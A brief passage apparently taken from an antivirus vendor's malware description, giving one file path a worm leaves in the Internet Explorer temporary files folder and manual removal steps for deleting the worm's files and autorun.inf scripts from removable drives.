%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes) - Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
